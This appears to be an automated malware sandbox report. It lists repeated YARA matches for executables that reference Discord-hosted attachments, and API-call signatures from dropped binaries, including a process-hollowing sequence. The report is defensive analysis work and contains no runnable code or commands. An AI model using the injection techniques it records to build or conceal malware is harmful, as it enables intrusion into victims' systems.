                        Source: 23.0.77DC.exe.a50000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: 29.0.A557.exe.2d0000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: 22.0.66A4.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: 22.0.66A4.exe.d70000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: 22.0.66A4.exe.d70000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: 22.0.66A4.exe.d70000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: 29.2.A557.exe.2d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: 23.0.77DC.exe.a50000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: 29.0.A557.exe.2d0000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: 29.0.A557.exe.2d0000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: 23.0.77DC.exe.a50000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: 23.2.77DC.exe.a50000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: 23.0.77DC.exe.a50000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: C:\Users\user\AppData\Local\Temp\A557.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: String function: 00410ED0 appears 39 times
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: String function: 0040FB00 appears 101 times
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: String function: 6B505720 appears 76 times
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: String function: 6B47B150 appears 128 times
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: String function: 6B4CD08C appears 41 times
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 3_2_0040185B Sleep,NtTerminateProcess,
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 3_2_00401866 Sleep,NtTerminateProcess,
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 3_2_0040187A Sleep,NtTerminateProcess,
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 3_2_0040163B NtMapViewOfSection,
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 3_2_004018D3 NtTerminateProcess,
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 3_2_00401884 Sleep,NtTerminateProcess,
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 3_2_00401888 NtTerminateProcess,
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 3_2_0040156A NtMapViewOfSection,
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 3_2_004015DB NtMapViewOfSection,NtMapViewOfSection,
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 3_2_004017EA Sleep,NtTerminateProcess,
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 3_1_0040156A NtMapViewOfSection,
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 3_1_004015DB NtMapViewOfSection,NtMapViewOfSection,
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 3_1_0040163B NtMapViewOfSection,
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeCode function: 17_2_02BA0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeCode function: 18_2_0040185B Sleep,NtTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeCode function: 18_2_00401866 Sleep,NtTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeCode function: 18_2_0040187A Sleep,NtTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeCode function: 18_2_0040163B NtMapViewOfSection,
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeCode function: 18_2_004018D3 NtTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeCode function: 18_2_00401884 Sleep,NtTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeCode function: 18_2_00401888 NtTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeCode function: 18_2_0040156A NtMapViewOfSection,
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeCode function: 18_2_004015DB NtMapViewOfSection,NtMapViewOfSection,
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeCode function: 18_2_004017EA Sleep,NtTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_0040181C Sleep,NtTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00402406 NtEnumerateKey,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00401F25 NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00401828 Sleep,NtTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00402431 NtEnumerateKey,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_004017DA Sleep,NtTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_004017F8 NtTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_0040209A NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_004017A3 Sleep,NtTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B99A0 ZwCreateSection,LdrInitializeThunk,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9860 ZwQuerySystemInformation,LdrInitializeThunk,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9820 ZwEnumerateKey,LdrInitializeThunk,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B98C0 ZwDuplicateObject,LdrInitializeThunk,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9780 ZwMapViewOfSection,LdrInitializeThunk,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9660 ZwAllocateVirtualMemory,LdrInitializeThunk,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B967A NtQueryInformationProcess,LdrInitializeThunk,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9600 ZwOpenKey,LdrInitializeThunk,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A3B48 ZwClose,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548B58 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B508372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B486B6B ZwQueryAttributesFile,RtlDeleteBoundaryDescriptor,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F7365 RtlRunOnceExecuteOnce,ZwQuerySystemInformation,RtlCaptureContext,memset,RtlReportException,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BAB60 ZwReleaseKeyedEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A3B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B506365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472B7E ZwSetInformationThread,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B526369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BAB70 ZwReleaseWorkerFactoryWorker,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B474B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B53131B RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9B00 ZwSetValueKey,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A5306 ZwReleaseKeyedEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B479335 ZwClose,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48A3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4723F6 ZwClose,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9BF0 ZwAlertThreadByThreadId,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A939F RtlInitializeCriticalSectionEx,ZwDelayExecution,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B53138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BA390 ZwGetCachedSigningLevel,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A4BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B549BBE RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BA3A0 ZwGetCompleteWnfStateSubscription,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B479240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B501242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9A50 ZwCreateFile,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548A62 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9A00 ZwProtectVirtualMemory,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B475210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B474A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BAA20 ZwQuerySecurityAttributesToken,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B504A28 ZwOpenKey,DbgPrintEx,ZwQueryValueKey,DbgPrintEx,DbgPrintEx,memcpy,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AB230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9A30 ZwTerminateThread,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B478239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B501AD6 ZwFreeVirtualMemory,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548ADD RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BAAC0 ZwQueryWnfStateNameInformation,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9AE0 ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BAAE0 ZwRaiseException,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ADA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B492280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BB280 ZwWow64DebuggerCall,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BAA90 ZwQuerySystemInformationEx,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AD294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4752A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B471AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47BAA0 RtlpLoadMachineUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlpLoadMachineUIByPolicy,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A5AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AE2BB ZwWaitForAlertByThreadId,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9AB0 ZwWaitForMultipleObjects,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47F150 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BB150 ZwUnsubscribeWnfStateChange,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B501976 ZwCreateEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BB160 ZwUpdateWnfStateData,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BA160 ZwCreateWorkerFactory,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548966 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AD976 ZwCreateFile,ZwCreateFile,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B479100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B480100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9900 ZwOpenEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B515100 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,RtlAssert,ZwTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B494120 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B50193B ZwRaiseException,ZwTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9920 ZwDuplicateToken,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B54F13B ZwOpenKey,ZwCreateKey,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BA130 ZwCreateWaitCompletionPacket,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5019C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5489E7 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9980 ZwCreateEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BB180 ZwWaitForAlertByThreadId,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B526186 ZwQueryValueKey,memmove,RtlInitUnicodeString,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B53A189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9990 ZwQueryVolumeInformationFile,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B54F1B5 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BB1A0 ZwWaitForKeyedEvent,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F51BE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AC9BF DbgPrintEx,wcsrchr,memcpy,DbgPrintEx,ZwClose,DbgPrintEx,DbgPrintEx,RtlDosPathNameToRelativeNtPathName_U,DbgPrintEx,ZwOpenFile,ZwClose,RtlFreeHeap,DbgPrintEx,DbgPrintEx,DbgPrintEx,RtlDeleteBoundaryDescriptor,ZwClose,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5349A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BA9B0 ZwQueryLicenseValue,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9840 ZwDelayExecution,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548858 ZwAlertThreadByThreadId,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B475050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9850 ZwQueryDirectoryFile,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48106F ZwOpenKey,ZwClose,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B501879 ZwAllocateVirtualMemory,memset,RtlInitializeSid,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B54F019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A4020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B9830 ZwOpenFile,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4770C0 ZwClose,RtlFreeHeap,RtlFreeHeap,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B00C2 ZwAlertThreadByThreadId,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B98D0 ZwQueryAttributesFile,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4BA0D0 ZwCreateTimer2,
